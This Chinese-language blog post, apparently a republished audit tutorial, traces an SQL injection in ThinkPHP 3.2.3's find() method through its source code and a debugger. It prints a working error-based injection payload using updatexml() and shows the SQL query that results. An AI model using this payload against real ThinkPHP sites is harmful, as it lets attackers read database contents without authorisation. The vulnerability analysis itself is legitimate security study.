一起聊聊thinkPHP3.2.3中sql注入漏洞
推薦學習:《》
前言
攻敵所必救:
ThinkPHP中的常用方法彙總總結:M方法,D方法,U方法,I方法
Thinkphp3.2.3 安全開發須知
搭建:
首先第一步就是必須先放在www目錄下(我是windows用的phpstudy)!!!!
建立資料庫,表名一定與你接下來要M的名字的相對應
連線資料庫的檔案不多說了,自己設定:ThinkPHP/Conf/convention.php
設定控制器:\WWW\thinkphp3.2.3\Application\Home\Controller\IndexController.class.php
<?phpnamespace Home\Controller;use Think\Controller;class IndexController extends Controller { public function index(){ $this->show('原來內容已經省略,太佔地方'); $data = M('user')->find(I('GET.id')); var_dump($data); }}測試:
正文
payload:
?id[where]=1 and 1=updatexml(1,concat(0x7e,user(),0x7e),1)%23
確實報錯注入成功,一切都是因為這句程式碼的存在:$data = M('user')->find(I('GET.id'));
I和M方法都沒有什麼問題,真正的問題在於
- find 方法上,來自
/ThinkPHP/Mode/Lite/Model.class.php
public function find($options=array()) {
// 根據複合主鍵查詢記錄
$pk = $this->getPk();
if (is_array($options) && (count($options) > 0) && is_array($pk)) {//但是會進入這裡
// 根據複合主鍵查詢
$count = 0;
foreach (array_keys($options) as $key) {
if (is_int($key)) $count++;
}
if ($count == count($pk)) {
$i = 0;
foreach ($pk as $field) {
$where[$field] = $options[$i];
unset($options[$i++]);
}
$options['where'] = $where;
} else {
return false;
}
}
// 總是查詢一條記錄
$options['limit'] = 1;
// 分析表示式
$options = $this->_parseOptions($options);//前面都沒有什麼影響,重點是這裡的函數呼叫
$resultSet = $this->db->select($options);//重要的一步2._parseOptions:因為主要針對options[where]所以無關程式碼我全刪除了
/ThinkPHP/Library/Think/Model.class.php
protected function _parseOptions($options=array()) {
if(is_array($options))
$options = array_merge($this->options,$options);
// 欄位型別驗證
if(isset($options['where']) && is_array($options['where']) && !empty($fields) && !isset($options['join'])) {//這裡不滿足is_array($options['where'])
// 對陣列查詢條件進行欄位型別檢查
foreach ($options['where'] as $key=>$val){
$key = trim($key);
if(in_array($key,$fields,true)){
if(is_scalar($val)) {
$this->_parseType($options['where'],$key);
}
}elseif(!is_numeric($key) && '_' != substr($key,0,1) && false === strpos($key,'.') && false === strpos($key,'(') && false === strpos($key,'|') && false === strpos($key,'&')){
if(!empty($this->options['strict'])){
E(L('_ERROR_QUERY_EXPRESS_').':['.$key.'=>'.$val.']');
}
unset($options['where'][$key]);
}
}
}
//上面均沒用,到現在開始有用:?
// 查詢過後清空sql表示式組裝 避免影響下次查詢
$this->options = array();
// 表示式過濾
$this->_options_filter($options);//這裡值得注意
return $options;
}3._options_filter
到這就無了
而且上面的操作也會清零 $options,所以這裡可能是進錯了
所以更正第二部的跟蹤,改為
2.select:/ThinkPHP/Library/Think/Db/Driver.class.php
public function select($options=array()) {
$this->model = $options['model'];
$this->parseBind(!empty($options['bind'])?$options['bind']:array());
$sql = $this->buildSelectSql($options);
$result = $this->query($sql,!empty($options['fetch_sql']) ? true : false);
return $result;
}3.buildSelectSql:地址同上
public function buildSelectSql($options=array()) {
if(isset($options['page'])) {
// 根據頁數計算limit
list($page,$listRows) = $options['page'];
$page = $page>0 ? $page : 1;
$listRows= $listRows>0 ? $listRows : (is_numeric($options['limit'])?$options['limit']:20);
$offset = $listRows*($page-1);
$options['limit'] = $offset.','.$listRows;
}
$sql = $this->parseSql($this->selectSql,$options);
return $sql;
}4.parseSql:地址同上
public function parseSql($sql,$options=array()){
$sql = str_replace(
array('%TABLE%','%DISTINCT%','%FIELD%','%JOIN%','%WHERE%','%GROUP%','%HAVING%','%ORDER%','%LIMIT%','%UNION%','%LOCK%','%COMMENT%','%FORCE%'),
array(
$this->parseTable($options['table']),
$this->parseDistinct(isset($options['distinct'])?$options['distinct']:false),
$this->parseField(!empty($options['field'])?$options['field']:'*'),
$this->parseJoin(!empty($options['join'])?$options['join']:''),
$this->parseWhere(!empty($options['where'])?$options['where']:''),
$this->parseGroup(!empty($options['group'])?$options['group']:''),
$this->parseHaving(!empty($options['having'])?$options['having']:''),
$this->parseOrder(!empty($options['order'])?$options['order']:''),
$this->parseLimit(!empty($options['limit'])?$options['limit']:''),
$this->parseUnion(!empty($options['union'])?$options['union']:''),
$this->parseLock(isset($options['lock'])?$options['lock']:false),
$this->parseComment(!empty($options['comment'])?$options['comment']:''),
$this->parseForce(!empty($options['force'])?$options['force']:'')
),$sql);
return $sql;
}5.parseWhere:同上
protected function parseWhere($where) {
$whereStr = '';
if(is_string($where)) {//直接滿足,直接進入
// 直接使用字串條件
$whereStr = $where;
}else{ // 使用陣列表示式
}
return empty($whereStr)?'':' WHERE '.$whereStr;}最後$sql=where 1 and 1=updatexml(1,concat(0x7e,user(),0x7e),1)%23
然後
$result = $this->query($sql,!empty($options['fetch_sql']) ? true : false);return $result;
整個過程沒有任何過濾,seay分析thinkPHP太飛費勁了
PHPstorm斷點審計:
payload不變:
?id[where]=1 and 1=updatexml(1,concat(0x7e,user(),0x7e),1)%23
還是跟蹤find函數:
跟蹤到這裡步入一下,繼續跟蹤,跟蹤到最後會跳出這個函數並且,值依然沒有改變,同時步入下一個函數
經核實,步入到了另一個函數中:
繼續跟蹤buildSelectSql:
繼續跟蹤parseSql:
最後的程式碼變成了:
SELECT * FROM user WHERE 1 and 1=updatexml(1,concat(0x7e,user(),0x7e),1)# LIMIT 1
還是debug起來方便,基本不需要怎麼動腦
推薦學習:《》
以上就是一起聊聊thinkPHP3.2.3中sql注入漏洞的詳細內容,更多請關注TW511.COM其它相關文章!